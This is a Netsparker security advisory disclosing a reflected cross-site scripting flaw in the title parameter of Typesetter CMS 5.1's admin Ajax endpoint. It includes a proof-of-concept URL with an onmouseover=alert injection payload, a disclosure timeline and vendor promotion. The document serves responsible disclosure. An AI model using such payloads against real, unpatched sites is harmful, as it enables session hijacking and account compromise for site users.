Information
--------------------
Advisory by Netsparker
Name: Reflected Cross-site Scripting Vulnerability in Typesetter
Affected Software: Typesetter
Affected Versions: 5.1
Homepage: https://www.typesettercms.com
Vulnerability: Cross-site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L
Netsparker Advisory Reference: NS-18-026

Technical Details
--------------------

The user log-in with administrative privileges is required.

URL :  http://{domain}/{Typesetter}/index.php/Admin/Menu/Ajax?cmd=AddHidden&redir=redir&title=x%20onmouseover%3dalert(0)%20x%3d&gpreq=json&jsoncallback=jQuery111303231258407947004_1524609082471&gpx_content=gpabox&_=1524609082474
Parameter Name  : title
Parameter Type  : GET
Attack Pattern  : x+onmouseover=netsparker(0x006C67)+x=  

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

16th May 2018- First Contact
23rd May 2018 - Vendor Fixed
4th December 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Mithat Gogebakan while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.